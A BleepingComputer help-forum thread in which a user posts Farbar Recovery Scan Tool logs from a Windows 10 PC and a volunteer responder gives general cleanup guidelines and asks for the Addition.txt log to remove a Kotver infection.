2016-10-12 21:35 - 2016-10-05 05:20 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2016-10-12 21:35 - 2016-10-05 05:20 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-10-12 21:35 - 2016-10-05 05:19 - 02390016 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2016-10-12 21:35 - 2016-10-05 05:18 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-10-12 21:35 - 2016-10-05 05:18 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-10-12 21:35 - 2016-10-05 05:18 - 00759296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-10-12 21:35 - 2016-10-05 05:17 - 08126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-10-12 21:35 - 2016-10-05 05:17 - 02914304 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-10-12 21:35 - 2016-10-05 05:16 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-10-12 21:35 - 2016-10-05 05:16 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2016-10-12 21:35 - 2016-10-05 05:15 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2016-10-12 21:35 - 2016-10-05 05:15 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2016-10-12 21:35 - 2016-10-05 05:14 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2016-10-12 21:35 - 2016-10-05 05:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2016-10-12 21:35 - 2016-10-05 05:12 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-10-12 21:35 - 2016-10-05 05:11 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-10-12 21:35 - 2016-10-05 05:11 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-10-12 21:35 - 2016-10-05 05:10 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2016-10-12 21:35 - 2016-10-05 05:09 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-10-12 21:35 - 2016-10-05 05:09 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-10-12 21:35 - 2016-10-05 05:08 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-10-12 21:35 - 2016-10-05 05:07 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-10-12 21:35 - 2016-10-05 05:07 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2016-10-12 21:35 - 2016-10-05 05:07 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-10-12 21:35 - 2016-10-05 05:07 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-10-12 21:35 - 2016-10-05 05:06 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-10-12 21:35 - 2016-10-05 05:05 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2016-10-12 21:35 - 2016-09-07 01:34 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-10-12 21:34 - 2016-10-05 06:35 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-10-12 21:34 - 2016-10-05 06:33 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2016-10-12 21:34 - 2016-10-05 06:31 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-10-12 21:34 - 2016-10-05 06:22 - 01181536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-10-12 21:34 - 2016-10-05 06:16 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-10-12 21:34 - 2016-10-05 06:12 - 01112928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-10-12 21:34 - 2016-10-05 06:09 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-10-12 21:34 - 2016-10-05 06:08 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-10-12 21:34 - 2016-10-05 06:03 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-10-12 21:34 - 2016-10-05 05:50 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2016-10-12 21:34 - 2016-10-05 05:49 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-10-12 21:34 - 2016-10-05 05:48 - 01022304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-10-12 21:34 - 2016-10-05 05:46 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-10-12 21:34 - 2016-10-05 05:46 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-10-12 21:34 - 2016-10-05 05:38 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2016-10-12 21:34 - 2016-10-05 05:36 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2016-10-12 21:34 - 2016-10-05 05:35 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2016-10-12 21:34 - 2016-10-05 05:35 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2016-10-12 21:34 - 2016-10-05 05:34 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-10-12 21:34 - 2016-10-05 05:32 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2016-10-12 21:34 - 2016-10-05 05:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-10-12 21:34 - 2016-10-05 05:31 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll
2016-10-12 21:34 - 2016-10-05 05:29 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-10-12 21:34 - 2016-10-05 05:28 - 03059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-10-12 21:34 - 2016-10-05 05:28 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2016-10-12 21:34 - 2016-10-05 05:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2016-10-12 21:34 - 2016-10-05 05:28 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2016-10-12 21:34 - 2016-10-05 05:27 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2016-10-12 21:34 - 2016-10-05 05:27 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2016-10-12 21:34 - 2016-10-05 05:27 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-10-12 21:34 - 2016-10-05 05:23 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-10-12 21:34 - 2016-10-05 05:22 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2016-10-12 21:34 - 2016-10-05 05:21 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll
2016-10-12 21:34 - 2016-10-05 05:20 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-10-12 21:34 - 2016-10-05 05:18 - 01656832 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2016-10-12 21:34 - 2016-10-05 05:17 - 04136960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2016-10-12 21:34 - 2016-10-05 05:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adsmsext.dll
2016-10-12 21:34 - 2016-10-05 05:16 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-10-12 21:34 - 2016-10-05 05:16 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-10-12 21:34 - 2016-10-05 05:16 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-10-12 21:34 - 2016-10-05 05:15 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-10-12 21:34 - 2016-10-05 05:15 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-10-12 21:34 - 2016-10-05 05:15 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-10-12 21:34 - 2016-10-05 05:14 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2016-10-12 21:34 - 2016-10-05 05:14 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-10-12 21:34 - 2016-10-05 05:13 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-10-12 21:34 - 2016-10-05 05:12 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2016-10-12 21:34 - 2016-10-05 05:12 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2016-10-12 21:34 - 2016-10-05 05:11 - 03496960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll
2016-10-12 21:34 - 2016-10-05 05:09 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2016-10-12 21:34 - 2016-10-05 05:08 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll
2016-10-12 21:34 - 2016-10-05 05:08 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-10-12 21:34 - 2016-10-05 05:07 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2016-10-12 21:34 - 2016-10-05 05:06 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-10-12 21:34 - 2016-10-05 05:05 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2016-10-12 21:34 - 2016-10-04 20:01 - 00446124 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-10-12 20:12 - 2016-10-30 12:51 - 00000000 ____D C:\Users\Harold\AppData\Local\NPE
2016-10-12 19:28 - 2016-10-12 20:03 - 00000000 ____D C:\Users\Harold\Documents\2016 Sept Gaylord
2016-10-08 09:43 - 2016-10-08 09:43 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini
2016-10-08 09:38 - 2016-10-16 17:32 - 00000000 ____D C:\Users\Harold\AppData\Local\0d9f76
2016-10-08 09:38 - 2016-10-08 09:38 - 00000000 ____D C:\Users\Harold\AppData\Roaming\dc130f
2016-10-01 18:11 - 2016-10-08 10:40 - 00000000 ____D C:\Users\Sue\AppData\Local\ConnectedDevicesPlatform
2016-10-01 18:11 - 2016-10-01 18:11 - 00000020 ___SH C:\Users\Sue\ntuser.ini

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-30 17:43 - 2012-09-06 19:52 - 00000000 ___RD C:\Users\Harold\Dropbox
2016-10-30 17:41 - 2016-09-25 18:26 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-10-30 17:41 - 2016-09-25 17:44 - 00000000 ____D C:\ProgramData\NVIDIA
2016-10-30 17:41 - 2015-08-23 11:16 - 00144368 ____N (CyberLink Corp.) C:\WINDOWS\system32\Drivers\rikvm_C6F09094.sys
2016-10-30 17:41 - 2011-03-05 05:13 - 00000000 ____D C:\ProgramData\PDFC
2016-10-30 17:40 - 2016-07-16 02:04 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2016-10-30 16:17 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-10-30 15:47 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-10-30 15:46 - 2011-03-13 19:35 - 00000000 ____D C:\Users\Harold\AppData\Local\CrashDumps
2016-10-30 15:43 - 2016-09-25 17:41 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-10-30 09:46 - 2016-07-16 07:45 - 00000000 ____D C:\WINDOWS\INF
2016-10-30 09:46 - 2015-08-23 11:34 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-10-29 19:30 - 2016-07-16 07:47 - 00000000 ___HD C:\Program Files\WindowsApps
2016-10-29 19:25 - 2016-07-16 02:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-10-29 19:24 - 2016-09-25 17:41 - 00393304 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-10-29 19:24 - 2013-11-25 20:19 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-10-29 19:24 - 2012-02-06 18:48 - 00000336 _____ C:\WINDOWS\Tasks\HPCeeScheduleForHarold.job
2016-10-29 19:23 - 2013-01-11 21:01 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-10-29 19:20 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-10-29 19:20 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-10-29 19:20 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-10-29 19:20 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-10-29 19:19 - 2016-07-16 07:47 - 00015425 _____ C:\WINDOWS\system32\OEMDefaultAssociations.xml
2016-10-29 14:50 - 2016-07-16 07:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-10-29 14:31 - 2016-09-25 18:26 - 00000000 ____D C:\WINDOWS\System32\Tasks\Remediation
2016-10-29 14:30 - 2016-09-25 18:26 - 00003232 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForHarold
2016-10-29 14:08 - 2009-05-09 21:32 - 00000000 ____D C:\Users\Harold\Documents\Sue
2016-10-29 07:59 - 2012-09-06 19:50 - 00000000 ____D C:\Users\Harold\AppData\Roaming\Dropbox
2016-10-29 07:48 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-10-29 07:48 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-10-24 19:30 - 2016-07-16 07:49 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-10-24 19:30 - 2016-07-16 07:49 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-10-23 10:53 - 2016-08-13 07:33 - 00000000 ____D C:\Users\Harold\Documents\2016 UP Vacation
2016-10-23 10:32 - 2016-09-25 18:26 - 00003592 _____ C:\WINDOWS\System32\Tasks\Seagate_Install_Launch
2016-10-23 10:31 - 2015-09-28 13:01 - 00002180 _____ C:\Users\Public\Desktop\Seagate Dashboard.lnk
2016-10-23 10:31 - 2015-09-28 13:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Seagate Dashboard
2016-10-20 12:41 - 2015-09-23 10:20 - 00000000 ____D C:\Users\Sue\AppData\Local\Packages
2016-10-17 20:15 - 2011-03-13 19:32 - 00000000 ____D C:\Users\Harold\Documents\Temp
2016-10-17 17:43 - 2016-09-25 17:48 - 01102996 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-10-17 17:36 - 2012-05-15 21:36 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-10-17 17:36 - 2012-05-15 21:36 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-10-17 17:36 - 2011-06-10 17:09 - 00000344 _____ C:\WINDOWS\Tasks\HPCeeScheduleForFAMILY-HP$.job
2016-10-17 14:55 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\rescache
2016-10-16 21:51 - 2016-09-25 18:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForFAMILY-HP$
2016-10-16 18:47 - 2012-05-15 21:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-10-16 18:34 - 2016-07-16 07:47 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-10-16 18:34 - 2015-07-19 09:47 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360
2016-10-16 18:34 - 2013-06-07 19:04 - 00000000 ____D C:\WINDOWS\system32\Drivers\N360x64
2016-10-16 18:33 - 2013-06-07 19:05 - 00002316 _____ C:\Users\Public\Desktop\Norton 360.lnk
2016-10-16 18:29 - 2013-08-13 20:37 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\migwiz
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-10-16 18:25 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-10-16 18:13 - 2011-03-14 22:24 - 143495576 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-10-16 17:33 - 2013-06-07 19:06 - 00100592 _____ (Symantec Corporation) C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS
2016-10-16 17:33 - 2013-06-07 19:06 - 00008319 _____ C:\WINDOWS\system32\Drivers\SYMEVENT64x86.CAT
2016-10-12 20:12 - 2011-03-05 05:16 - 00000000 ____D C:\ProgramData\Norton
2016-10-11 21:15 - 2016-07-16 07:43 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2016-10-11 21:15 - 2016-07-16 07:42 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2016-10-11 20:56 - 2016-09-25 18:26 - 00004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2016-10-11 20:56 - 2015-11-28 08:43 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-10-11 20:50 - 2016-09-25 18:26 - 00003804 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-10-09 09:04 - 2011-03-13 11:02 - 00000000 ____D C:\Users\Harold\AppData\Roaming\HpUpdate
2016-10-08 09:43 - 2016-09-25 17:49 - 00000000 ____D C:\Users\DefaultAppPool
2016-10-08 07:33 - 2016-09-25 17:49 - 00000000 ____D C:\Users\Sue
2016-10-01 18:44 - 2016-09-25 17:49 - 00000000 ____D C:\Users\Harold
2016-10-01 18:16 - 2015-09-23 10:28 - 00002404 _____ C:\Users\Sue\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-10-01 18:16 - 2015-09-23 10:28 - 00000000 ___RD C:\Users\Sue\OneDrive

==================== Files in the root of some directories =======

2012-02-03 20:25 - 2016-02-02 19:55 - 0001255 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Files to move or delete:
====================
C:\Users\Harold\jagex_runescape_preferences.dat
C:\Users\Harold\jagex_runescape_preferences2.dat


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-10-29 14:31

==================== End of FRST.txt ============================





#2 dbrisendine

  • Malware Response Team
  • 508 posts
  • Gender:Male
  • Location:BC, Canada
  • Local time:10:50 AM

Posted 30 October 2016 - 06:50 PM

Hi brokus4,

Welcome to BleepingComputer. My name is dbrisendine and I'll be helping you with this problem. Before I get into the removal of malware / correction of your problem, I need you to be aware of the following:

  • Please read all of my response through at least once before attempting to follow the procedures described. I would recommend printing them out, if you can, as you can check off each step as you complete it. Also, as some of the cleaning may be done in Safe Mode and there will be no internet connection then, you will find that having the steps printed for reference speeds the cleaning process along. If there's anything you don't understand or isn't totally clear to you, please come back to me for clarification before you start those steps.
  • All of the assistants and staff at BleepingComputer are here on a volunteer basis; please respect our time given to the cause of helping others. If you are going to be away for more than 4 days, please let me know here. (I will do the same for you.) We do realize that 'life happens' and situations arise unexpectedly; we just ask that you keep us up to date.
  • Malware removal is a complex, multiple step process; please stay with me on this thread (don't start another thread) until I declare that your logs are clean and you are good to go. The absence of apparent issues does not mean your system is clean; I will tell you when everything looks good for you to go and help you remove the tools we have used.
  • If any of the security programs on your system should give any warnings about the software tools I ask you to download and use, please do not be alarmed. All of the tools I will have you use are safe to use (as instructed) and malware free.
  • While we strive to disrupt your system as little as possible, things happen. If you can, it would be best to back up your personal files now (if you do not already have a backup). You can store these on a CD/DVD, USB drive or stick, anywhere but on your same system. This will save you from possible anguish later if something unforeseen happens.
  • Please do not run any other tools or scanners than what I ask you to. Some of the openly available software made for malware removal can make changes to your system that interfere with the cleaning of the malware, or even destroy your system. I will use only what the situation calls for and direct you in the proper use of that software.
  • Please do not attach any log files to your replies unless I specifically ask you. Instead please copy and paste so as to include the log in your reply. You can do this in separate posts if it's easier for you.


    - Save ALL Tools to your Desktop-
     

    All the tools that I will have you download should be placed on the desktop unless otherwise stated. If you are familiar with how to save files to the desktop then you can skip this step.

    Since you are continuing with this step then I assume you are unfamiliar with saving files to your desktop. As a result it's easiest if you configure your browser(s) to download any tools to the desktop by default. Please use the appropriate instructions below depending on the browser you are using.
    Google Chrome - Click the "Customize and control Google Chrome" button in the upper-right corner of the browser. Choose Settings. At the bottom of the screen click the "Show advanced settings..." link. Scroll down to find the Downloads section and click the Change... button. Select your desktop and click OK.
    Mozilla Firefox - Click the "Open Menu" button in the upper-right corner of the browser. Choose Options. In the downloads section, click the Browse button, click on the Desktop folder and then click the "Select Folder" button. Click OK to get out of the Options menu.
    Internet Explorer - Click the Tools menu in the upper-right corner of the browser. Select View downloads. Select the Options link in the lower left of the window. Click Browse and select the Desktop and then choose the Select Folder button. Click OK to get out of the download options screen and then click Close to get out of the View Downloads screen.
    NOTE: IE8 does not support changing download locations in this manner. You will need to download the tool(s) to the default folder, usually Downloads, then copy them to the desktop.
     

Let's get started....
 

The scan by FRST should have produced a second log file named Addition.txt. Please post it as there is vital info in it to remove the Kotver infection completely.


Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif


#3 brokus4

brokus4
  • Topic Starter

  • Members
  • 14 posts
  • Local time:12:50 PM

Posted 30 October 2016 - 07:01 PM

Hello! Thank you dbrisendine for volunteering to help me! Below are the contents of the file Addition.txt.

 

BTW, I apologize if my original posting appeared more than once. My browser keeps telling me that it failed to send.

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-10-2016
Ran by Harold (30-10-2016 18:34:28)
Running from C:\Users\Harold\Desktop
Windows 10 Home Version 1607 (X64) (2016-09-25 22:31:10)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1355648730-1136835254-2900194302-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1355648730-1136835254-2900194302-503 - Limited - Disabled)
Guest (S-1-5-21-1355648730-1136835254-2900194302-501 - Limited - Disabled)
Harold (S-1-5-21-1355648730-1136835254-2900194302-1001 - Administrator - Enabled) => C:\Users\Harold
HomeGroupUser$ (S-1-5-21-1355648730-1136835254-2900194302-1002 - Limited - Enabled)
Sue (S-1-5-21-1355648730-1136835254-2900194302-1003 - Limited - Enabled) => C:\Users\Sue

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton 360 (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton 360 (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton 360 (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20039 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.3.0.3670 - Adobe Systems Incorporated)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.5.23 - Adobe Systems Incorporated.)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Photoshop Elements 9 (HKLM-x32\...\Adobe Photoshop Elements 9) (Version: 9.0.3.0 - Adobe Systems Incorporated)
Adobe Photoshop.com Inspiration Browser (HKLM-x32\...\PhotoshopdotcomInspirationBrowser.4C35C4D325D350FE0114230CBADCA2DDD0AC8D25.1) (Version: 3.07 - Adobe Systems Incorporated)
Agatha Christie - Peril at End House (x32 Version: 2.2.0.95 - WildTangent) Hidden
Aimersoft DVD Ripper(Build 3.0.0.2) (HKLM-x32\...\Aimersoft DVD Ripper_is1) (Version:  - Aimersoft Software)
ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{AFA1153A-F547-409B-B837-3A0D6C5A3FEC}) (Version: 3.1.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{D7B824DE-DA32-4772-9E5E-39C5158136A7}) (Version: 3.1.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C4123106-B685-48E6-B9BD-E4F911841EB4}) (Version: 8.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Blasterball 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Blio (HKLM-x32\...\{8D3903E2-4B1B-4A69-B8F6-A3D1BE075BDB}) (Version: 2.2.6484 - K-NFB Reading Technology, Inc.)
